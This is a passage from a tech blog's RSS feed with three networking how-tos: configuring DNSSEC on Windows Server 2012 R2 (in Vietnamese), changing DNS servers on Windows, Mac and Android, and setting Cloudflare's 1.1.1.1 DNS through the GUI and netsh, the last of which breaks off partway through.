<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F211.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="2" src="https://huypd.files.wordpress.com/2013/11/2_thumb3.png?w=399&amp;h=323" alt="2" width="399" height="323" border="0"/></a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F44.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="4" src="https://huypd.files.wordpress.com/2013/11/4_thumb3.png?w=678&amp;h=473" alt="4" width="678" height="473" border="0"/></a></p>
<ul>
<li>Chọn “Customize zone signing parameters” để ta tiến hành cấu hình thông số cho việc Sign zone</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F52.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="5" src="https://huypd.files.wordpress.com/2013/11/5_thumb2.png?w=494&amp;h=345" alt="5" width="494" height="345" border="0"/></a></p>
<ul>
<li>Chọn Key Master cho zone</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F62.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="6" src="https://huypd.files.wordpress.com/2013/11/6_thumb2.png?w=498&amp;h=348" alt="6" width="498" height="348" border="0"/></a></p>
<ul>
<li>Tiếp theo ta sẽ cấu hình KSK, KSK là nơi quản lý và tạo ra các DNSKEY.</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F611.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="6 1" src="https://huypd.files.wordpress.com/2013/11/61_thumb.png?w=493&amp;h=344" alt="6 1" width="493" height="344" border="0"/></a></p>
<ul>
<li>Remove Key đang sẵn có, Add một key mới với thông số : thuật mã hóa RSA/SHA-512 và số bits là 2048. Nhấn OK</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F72.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="7" src="https://huypd.files.wordpress.com/2013/11/7_thumb2.png?w=383&amp;h=353" alt="7" width="383" height="353" border="0"/></a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F83.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="8" src="https://huypd.files.wordpress.com/2013/11/8_thumb3.png?w=511&amp;h=357" alt="8" width="511" height="357" border="0"/></a></p>
<ul>
<li>Tiếp tục với ZKS, ZKS là nơi quản lý và tạo ra Private Key – RRSIG.</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F93.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="9" src="https://huypd.files.wordpress.com/2013/11/9_thumb3.png?w=511&amp;h=357" alt="9" width="511" height="357" border="0"/></a></p>
<ul>
<li>Remove Key đang sẵn có, Add một key mới với thông số : thuật mã hóa RSA/SHA-512 và số bits là 1024. Nhấn OK</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F103.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="10" src="https://huypd.files.wordpress.com/2013/11/10_thumb3.png?w=510&amp;h=367" alt="10" width="510" height="367" border="0"/></a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F116.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="11" src="https://huypd.files.wordpress.com/2013/11/11_thumb2.png?w=508&amp;h=355" alt="11" width="508" height="355" border="0"/></a></p>
<ul>
<li>Cấu hình NSEC, có thể để mặc định</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F122.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="12" src="https://huypd.files.wordpress.com/2013/11/12_thumb2.png?w=507&amp;h=354" alt="12" width="507" height="354" border="0"/></a></p>
<ul>
<li>Enable tính năng tự động distribute trust anchor cho các máy AD/ADC khác trong domain</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F132.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="13" src="https://huypd.files.wordpress.com/2013/11/13_thumb2.png?w=504&amp;h=352" alt="13" width="504" height="352" border="0"/></a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F142.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="14" src="https://huypd.files.wordpress.com/2013/11/14_thumb2.png?w=505&amp;h=353" alt="14" width="505" height="353" border="0"/></a></p>
<ul>
<li>Lúc này ta đã có các Record DNSSEC</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F151.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="15" src="https://huypd.files.wordpress.com/2013/11/15_thumb1.png?w=578&amp;h=403" alt="15" width="578" height="403" border="0"/></a></p>
<ul>
<li>Key lúc này là RSA/SHA-512</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F161.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="16" src="https://huypd.files.wordpress.com/2013/11/16_thumb1.png?w=578&amp;h=403" alt="16" width="578" height="403" border="0"/></a></p>
<ul>
<li>Thực hiện “get-dnsservertrustanchor –name <span class="skimlinks-unlinked">dnssec.huypd.com</span> –computer dns” . Ta thấy máy DNS vẫn dùng Trust Anchor cũ.</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F171.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="17" src="https://huypd.files.wordpress.com/2013/11/17_thumb1.png?w=579&amp;h=426" alt="17" width="579" height="426" border="0"/></a></p>
<ul>
<li>Do ta Re-sign lại nên máy DNS sẽ không tự động cập nhật Trust Anchor mới được, và lúc này nó vẫn dùng Trust Anchor cũ. Ta cần phải cấu hình bằng tay lại. Ta thực hiện 2 lệnh bên dưới để xóa Trust Anchor cũ, “remove-dnsservertrustanchor” và “remove-dnsserverzone”</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F2101.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="21 0" src="https://huypd.files.wordpress.com/2013/11/210_thumb.png?w=568&amp;h=481" alt="21 0" width="568" height="481" border="0"/></a></p>
<ul>
<li>Thực hiện import key mới vào</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F212.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="21" src="https://huypd.files.wordpress.com/2013/11/21_thumb1.png?w=576&amp;h=402" alt="21" width="576" height="402" border="0"/></a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F221.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="22" src="https://huypd.files.wordpress.com/2013/11/22_thumb1.png?w=290&amp;h=131" alt="22" width="290" height="131" border="0"/></a></p>
<ul>
<li>Lúc này ta đã có Trust Anchor mới nhất</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F231.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="23" src="https://huypd.files.wordpress.com/2013/11/23_thumb1.png?w=581&amp;h=406" alt="23" width="581" height="406" border="0"/></a></p>
<p><strong>7) Transfer the Key Master role for <span class="skimlinks-unlinked">dnssec.huypd.com</span> to ADC (Thực hiện chuyển Key Master của zone sang máy ADC)</strong></p>
<ul>
<li>Trên máy DC, chuột phải zone <span class="skimlinks-unlinked">dnssec.huypd.com</span> –&gt; DNSSEC –&gt; Properties</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F117.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="1" src="https://huypd.files.wordpress.com/2013/11/1_thumb6.png?w=581&amp;h=405" alt="1" width="581" height="405" border="0"/></a></p>
<ul>
<li>Chọn thẻ Key Master –&gt; Sau đó chọn “Use the following DNS Server as the Key Master”, chọn máy ADC.</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F213.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="2" src="https://huypd.files.wordpress.com/2013/11/2_thumb4.png?w=401&amp;h=484" alt="2" width="401" height="484" border="0"/></a></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;70&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>
            Bài viết đạt: 5/5 &#8211; (100 bình chọn)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/huong-dan-dnssec-dns-security-extension-full-windows-server-2012-r2/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2015/04/2-2.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>How to change DNS Server on Windows, Mac and Android</title>
		<link>https://en.anonyviet.com/how-to-change-dns-server-on-windows-mac-and-android/</link>
					<comments>https://en.anonyviet.com/how-to-change-dns-server-on-windows-mac-and-android/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 27 Jan 2023 21:14:06 +0000</pubDate>
				<category><![CDATA[Network]]></category>
		<category><![CDATA[Android]]></category>
		<category><![CDATA[change]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[Mac]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=5158</guid>

					<description><![CDATA[If you do not know how to change DNS Server on Windows, Mac and Android computers, please refer to the steps below. I will guide you step by step for you to apply right on your device. Change DNS on Windows computers Step 1: Go to the Start Menu and type in the search box [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p>If you do not know how to change DNS Server on Windows, Mac and Android computers, please refer to the steps below.  I will guide you step by step for you to apply right on your device.</p>
<blockquote>
<h3 id="ftoc-doi-dns-tren-may-tinh-windows" class="ftwp-heading"><span style="color: #ff0000;"><strong>Change DNS on Windows computers</strong></span></h3>
</blockquote>
<p>Step 1: Go to the Start Menu and type in the search box “Network and Sharing Center” and press Enter.</p>
<p>Step 2: A window will appear and here you will probably see a lot of current connections if you have a virtual machine installed, etc.</p>
<div>
<div class="separator"><img decoding="async" class="alignnone size-full wp-image-4156" src="https://anonyviet.com/wp-content/uploads/2017/01/ddddddddddddddddddddddddddddd.jpg" width="320" height="199" alt="How to change DNS Server on Windows, Mac and Android 4" srcset="https://anonyviet.com/wp-content/uploads/2017/01/ddddddddddddddddddddddddddddd.jpg 320w, https://anonyviet.com/wp-content/uploads/2017/01/ddddddddddddddddddddddddddddd-300x187.jpg 300w" sizes="(max-width: 320px) 100vw, 320px" title="How to change DNS Server on Windows, Mac and Android 9"/></div>
<p>Step 3: Click on the link Change adapter settings on the left.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<p>Step 4: Right-click the Connection you are using → Properties → Internet Version Protocol (TCP/IPv4) → Properties.</p>
<p>Step 5: Tick the box “Use the following DNS server”.  Fill in 2 DNS Server addresses and click OK to save.</p>
<div><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-2215" src="https://tinhoc24h.net/wp-content/uploads/2015/11/cach-doi-dns-server-tren-windows.jpg" alt="How to change DNS Server on Windows" width="414" height="461" title="How to change DNS Server on Windows, Mac and Android 10"/></div>
<div>If you often have to change DNS Server, my advice is to use <a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Ftinhoc24h.net%2Fdns-jumper%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">DNS Jumper software</a> that I introduced earlier to make it easier to use.</div>
<h3 id="ftoc-doi-dns-tren-may-tinh-mac" class="ftwp-heading"><span style="color: #ff0000;"><strong>                Change DNS on MAC computer</strong></span></h3>
<p>Step 1: Launch Spotlight by pressing Cmd + Space and typing in Network.</p>
<p>Step 2: There will be a blue dot next to the connections you are using.  Click “Advanced Settings” and select “DNS” in the Connection Properties and press the + sign.</p>
<div><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-2216" src="https://tinhoc24h.net/wp-content/uploads/2015/11/cach-doi-dns-server-tren-mac-os.jpg" alt="How to change DNS Server on Mac OS" width="666" height="563" title="How to change DNS Server on Windows, Mac and Android 11"/></div>
<p>Step 3: Fill in the DNS Server that you need to change.  Then click OK to save the settings.</p>
<h3/>
<h3 id="ftoc-cach-thay-doi-dns-tren-android" class="ftwp-heading"><strong><span style="color: #ff0000;">                How to change DNS on Android</span></strong></h3>
<p>Step 1: Open the Wifi management menu on your device.</p>
<p>Step 2: Touch and hold the Wifi network you are connecting to and select “Modify Network”.</p>
<p>Step 3: Tick the box &#8220;Show hidden options&#8221; then select &#8220;Static IP Address&#8221;.</p>
<div><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-2217" src="https://tinhoc24h.net/wp-content/uploads/2015/11/change-DNS-server-on-android.jpg" alt="change-DNS-server-on-android" width="616" height="512" title="How to change DNS Server on Windows, Mac and Android 12"/></div>
<p>Step 4: Enter the DNS Server address in the DNS1 and DNS2 input boxes.  Finally, tap the OK button to save.</p>
<p>So you can see that changing DNS on devices is quite simple, isn&#8217;t it.  This way you can access some blocked websites as well as resolve domains faster for optimal surfing speed.</p>
<p>Good luck!</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;292&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-change-dns-server-on-windows-mac-and-android/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2015/12/dns-domain-name-server.png" medium="image"></media:content>
            	</item>
		<item>
		<title>Instructions to adjust DNS to 1.1.1.1 to speed up web surfing</title>
		<link>https://en.anonyviet.com/instructions-to-adjust-dns-to-1-1-1-1-to-speed-up-web-surfing/</link>
					<comments>https://en.anonyviet.com/instructions-to-adjust-dns-to-1-1-1-1-to-speed-up-web-surfing/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 27 Jan 2023 00:07:06 +0000</pubDate>
				<category><![CDATA[Network]]></category>
		<category><![CDATA[1.1.1.1]]></category>
		<category><![CDATA[adjust]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[Instructions]]></category>
		<category><![CDATA[Speed]]></category>
		<category><![CDATA[surfing]]></category>
		<category><![CDATA[web]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=4448</guid>

					<description><![CDATA[Cloudflare just launched its DNS service for all customers on Lie day (1/4) this year. This DNS service promises to speed up your internet connection to help protect internet privacy. This service is using the address https://1.1.1.1 is a real and pubic IP address for all users. Join the channel Telegram of the AnonyViet 👉 [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p style="text-align: justify;"><strong>Cloudflare just launched its DNS service for all customers on Lie day (1/4) this year.  This DNS service promises to speed up your internet connection to help protect internet privacy.  This service is using the address  <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2F1.1.1.1" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';"> https://1.1.1.1</a> is a real and pubic IP address for all users.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>  With the fastest response time, DNS cloudflare is currently the fastest service to help you access Webstie in the world.</p>
<h2 id="ftoc-dns-la-gi" class="ftwp-heading"><strong><span style="color: #800080;">What is DNS?</span></strong></h2>
<p style="text-align: justify;"><strong>DNS (Domain Name System)</strong> plays an important role in the resolution of IP addresses into domain names.  Normally, websites have a fixed IP address, in the old days to access websites, people often had to remember each IP of each web address they wanted to access.  Memorizing an IP address is difficult, because it&#8217;s full of numbers.  DNS was born to overcome that problem, it helps to convert the IP address into a specific domain name.  Makes it easier to remember Web addresses.</p>
<p style="text-align: justify;">DNS is an essential part of the internet, but DNS servers provided by ISPs are often slow and unreliable.  Your ISP or any Wi-Fi network you connect to may use DNS servers to identify all visited websites, however no one can guarantee the safety and security of your privacy. user.</p>
<h2 id="ftoc-dns-cua-cloudflare-co-gi-moi" class="ftwp-heading" style="text-align: justify;"><strong><span style="color: #800080;">What&#8217;s New in Cloudflare DNS?</span></strong></h2>
<p style="text-align: justify;">Cloudflare DNS provides support for both DNS-over-TLS and DNS-over-HTTPS .  Cloudflare&#8217;s DNS currently has a global response time of 14ms, compared to 20ms for OpenDNS and 34ms for Google&#8217;s DNS, so it&#8217;s the fastest DNS solution for all of the time.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F04%2Fdich-vu-1.1.1.1-650.jpg" rel="noopener" class="local-link"><img post-id="4448" fifu-featured="1" decoding="async" class="aligncenter size-full wp-image-9174" src="https://anonyviet.com/wp-content/uploads/2018/04/dich-vu-1.1.1.1-650.jpg" alt="Instructions to adjust DNS to 1.1.1.1 to speed up web surfing" title="Instructions to adjust DNS to 1.1.1.1 to speed up web surfing" width="650" height="335" srcset="https://anonyviet.com/wp-content/uploads/2018/04/dich-vu-1.1.1.1-650.jpg 650w, https://anonyviet.com/wp-content/uploads/2018/04/dich-vu-1.1.1.1-650-300x155.jpg 300w" sizes="(max-width: 650px) 100vw, 650px" title="Instructions to adjust DNS to 1.1.1.1 to speed up web surfing"/></a></p>
<h2 id="ftoc-cach-chinh-dns-ve-1-1-1-1-tang-toc-luot-web" class="ftwp-heading" style="text-align: justify;"><strong><span style="color: #800080;">How to adjust DNS to 1.1.1.1 to speed up web surfing</span></strong></h2>
<h3 id="ftoc-cach-chinh-dns-tren-windows-10" class="ftwp-heading" style="text-align: justify;"><strong><span style="color: #0000ff;">How to adjust DNS on Windows 10</span></strong></h3>
<p>First you enter <strong>Settings</strong> -> Select <strong>Network and Internet</strong></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F04%2Fdns1.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-9162" src="https://anonyviet.com/wp-content/uploads/2018/04/dns1.jpg" alt="dns 1.1.1.1" width="1201" height="863" srcset="https://anonyviet.com/wp-content/uploads/2018/04/dns1.jpg 1201w, https://anonyviet.com/wp-content/uploads/2018/04/dns1-300x216.jpg 300w, https://anonyviet.com/wp-content/uploads/2018/04/dns1-1024x736.jpg 1024w, https://anonyviet.com/wp-content/uploads/2018/04/dns1-768x552.jpg 768w, https://anonyviet.com/wp-content/uploads/2018/04/dns1-120x86.jpg 120w, https://anonyviet.com/wp-content/uploads/2018/04/dns1-350x250.jpg 350w, https://anonyviet.com/wp-content/uploads/2018/04/dns1-750x539.jpg 750w, https://anonyviet.com/wp-content/uploads/2018/04/dns1-1140x819.jpg 1140w" sizes="auto, (max-width: 1201px) 100vw, 1201px" title="Instructions to adjust DNS to 1.1.1.1 to speed up web surfing"/></a></p>
<p>Select <strong>Change Adapter options</strong></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F04%2Fdns2.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-9163" src="https://anonyviet.com/wp-content/uploads/2018/04/dns2.jpg" alt="dns 1.1.1.1" width="994" height="891" srcset="https://anonyviet.com/wp-content/uploads/2018/04/dns2.jpg 994w, https://anonyviet.com/wp-content/uploads/2018/04/dns2-300x269.jpg 300w, https://anonyviet.com/wp-content/uploads/2018/04/dns2-768x688.jpg 768w, https://anonyviet.com/wp-content/uploads/2018/04/dns2-750x672.jpg 750w" sizes="auto, (max-width: 994px) 100vw, 994px" title="Instructions to adjust DNS to 1.1.1.1 speed up web surfing 15"/></a></p>
<p><span style="color: #0000ff;"><strong>Right click (right click)</strong></span>  go to the network card to adjust DNS</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F04%2Fdns3.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-9164" src="https://anonyviet.com/wp-content/uploads/2018/04/dns3.jpg" alt="dns 1.1.1.1" width="447" height="330" srcset="https://anonyviet.com/wp-content/uploads/2018/04/dns3.jpg 447w, https://anonyviet.com/wp-content/uploads/2018/04/dns3-300x221.jpg 300w" sizes="auto, (max-width: 447px) 100vw, 447px" title="Instructions to adjust DNS to 1.1.1.1 speed up web surfing 16"/></a></p>
<p><strong><span style="color: #0000ff;">Double Click</span></strong>  into the <strong>Internet Protocol Version 4 (TCP/IPv4)</strong></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F04%2Fdns4.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-9168" src="https://anonyviet.com/wp-content/uploads/2018/04/dns4.jpg" alt="Instructions to adjust DNS to 1.1.1.1 to speed up web surfing 3" width="452" height="580" srcset="https://anonyviet.com/wp-content/uploads/2018/04/dns4.jpg 452w, https://anonyviet.com/wp-content/uploads/2018/04/dns4-234x300.jpg 234w" sizes="auto, (max-width: 452px) 100vw, 452px" title="Instructions to adjust DNS to 1.1.1.1 to speed up web surfing"/></a></p>
<p>In the tab <strong>General, </strong>You can edit the image below</p>
<p><span style="color: #0000ff;">Check</span> check box<strong> Use the following DNS server address:</strong></p>
<ul>
<li>Preferred DNS server: <span style="color: #008000;">1.1.1.1</span></li>
<li>Alternate DNS server: <span style="color: #008000;">1.0.0.1</span></li>
</ul>
<p>For IPv6 only, you use this address:</p>
<ul>
<li><span style="color: #008000;">2606:4700:4700::1111 </span></li>
<li><span style="color: #008000;">2606:4700:4700::1001</span></li>
</ul>
<p>Then click OK to finish.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F04%2Fdns5.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-9167" src="https://anonyviet.com/wp-content/uploads/2018/04/dns5.jpg" alt="Instructions to adjust DNS to 1.1.1.1 to speed up surfing 4" width="541" height="660" srcset="https://anonyviet.com/wp-content/uploads/2018/04/dns5.jpg 541w, https://anonyviet.com/wp-content/uploads/2018/04/dns5-246x300.jpg 246w" sizes="auto, (max-width: 541px) 100vw, 541px" title="Instructions to adjust DNS to 1.1.1.1 to speed up web surfing"/></a></p>
<h3 id="ftoc-cach-chinh-dns-bang-cmd-cho-tat-ca-windows" class="ftwp-heading" style="text-align: justify;"><strong><span style="color: #0000ff;">How to adjust DNS with CMD for all Windows</span></strong></h3>
<p>With the way to adjust DNS with CMD, you can apply it to any Windows from Windows 7 to Windows 10.</p>
<p><span style="color: #008080;"><strong>Step 1:</strong></span>  You need to open CMD with Administrator rights.</p>
<p><span style="color: #008080;"><strong>Step 2:</strong> </span>Type the command below to display the names of all network cards available on the computer</p>
<pre class="lang:default decode:true ">wmic nic get NetConnectionID</pre>
<p><span style="color: #008080;"><strong>Step 3:</strong></span>  Enter the command below to start setting up the network card, press Enter</p>
<pre class="lang:default decode:true ">netsh</pre>
<p><span style="color: #008080;"><strong>Step 4:</strong> </span>Type the following command to set up the primary DNS IP address and press Enter :</p>
<pre class="lang:default decode:true">interface ip set dns name="ADAPTER-NAME" source="static" address="X.X.X.X"</pre>
<p>In this command, remember to change <strong>ADAPTER-NAME</strong> with the name of the network card you queried in <strong>Step 2</strong> And change <strong>XXXX</strong> with the DNS server address you want to use.</p>
<p><span style="color: #ff0000;"><strong>Eg:</strong> </span>I want to change the network card named <span style="color: #800080;"><strong>WIFI</strong></span>  with DNS is<strong><span style="color: #0000ff;">  1.1.1.1</span></strong>  of then I would use the following command:</p>
<pre class="lang:default decode:true">interface ip set dns name="Wi-Fi" source="static" address="1.1.1.1"</pre>
<p><span style="color: #008080;"><strong>Step 5:</strong></span>  Type the following command to set up a backup DNS</p>
<pre class="lang:default decode:true">interface ip add dns name="ADAPTER-NAME" addr="X.X.X.X" index=2</pre>
